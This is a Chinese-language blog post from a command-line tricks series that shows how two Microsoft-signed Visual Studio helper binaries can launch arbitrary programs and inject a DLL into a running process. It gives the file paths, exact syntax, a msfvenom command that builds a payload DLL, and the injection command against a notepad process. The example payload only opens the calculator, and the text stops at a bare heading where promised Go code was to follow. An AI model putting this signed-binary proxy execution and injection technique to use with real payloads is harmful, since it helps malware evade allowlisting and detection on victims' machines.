有趣的命令行系列，使用微软签名的二进制文件进行dll inject

off999 2025-06-18 23:30 24 浏览 0 评论

有趣的命令行系列又来了，这次带来了两个新的命令，是安装visual studio ide时，勾选了nodejs和python才有的。

第一个命令是
Microsoft.NodejsTools.PressAnyKey.exe，默认目录是在C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools。微软的IDE下的工具当然带有微软的数字签名了。

这个命令比较简单，默认语法是：

Microsoft.NodejsTools.PressAnyKey.exe normal <random-file-name> <exe>

你可以把
Microsoft.NodejsTools.PressAnyKey.exe拷贝出来单独用，像我是放在了D盘。

运行计算器：
Microsoft.NodejsTools.PressAnyKey.exe normal 1 calc.exe

第二个命令是inject_dll_amd64.exe，当然同目录下也有个inject_dll_x86.exe。目录在

C:\Program Files(x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Python\Core\debugpy\_vendored\pydevd\pydevd_attach_to_process

看名字就知道是用来dll inject的，也是带有微软签名的。我们先来生成一个执行计算器的dll。我生成的是64位的。

msfvenom -a x64 --platform windows -p windows/x64/exec CMD="calc.exe" -f dll -o calc.dll

我们来执行看一下。

taskkill /f /im notepad.exe //杀死记事本进程
notepad && tasklist |find "notepad.exe" //找到记事本进程的pid。
inject_dll_amd64.exe 11904 D:\dll_inject_vs_binaries\calc64.dll
//calc64.dll就是kali下生成的，我改了个名。11904是刚启动的记事本的pid。

我也试过用别的进程的pid，用了chome的没成功，用记事本的成功了。

当然你用inject_dll_x86.exe就要用32位的dll了。最后再附一个如何用go语言写dllmain样式的dll代码吧。

编译方法是go build -ldflags "-s -w" -buildmode=c-shared -o calc.dll 1.go。

python调用dll